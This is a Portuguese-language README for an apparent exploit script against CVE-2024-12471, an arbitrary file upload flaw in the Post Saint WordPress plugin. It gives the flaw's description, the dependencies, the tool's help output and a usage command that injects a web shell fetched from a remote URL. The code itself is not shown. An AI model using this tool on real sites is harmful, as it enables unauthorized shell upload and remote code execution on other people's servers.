
Post Saint <= 1.3.1 plugin para WordPress de Upload Arbitrário de Arquivo
Post Saint <= 1.3.1 plugin para WordPress com Upload Arbitrário de Arquivos
O plugin Post Saint para WordPress (versões até e incluindo 1.3.1) é vulnerável a uploads arbitrários de arquivos devido à falta de verificações de capacidade e validação de tipo de arquivo. Atacantes autenticados com pelo menos acesso de nível de assinante podem explorar essa vulnerabilidade para enviar arquivos arbitrários, potencialmente levando à execução remota de código.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Este script é apenas para fins educacionais e de pesquisa. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.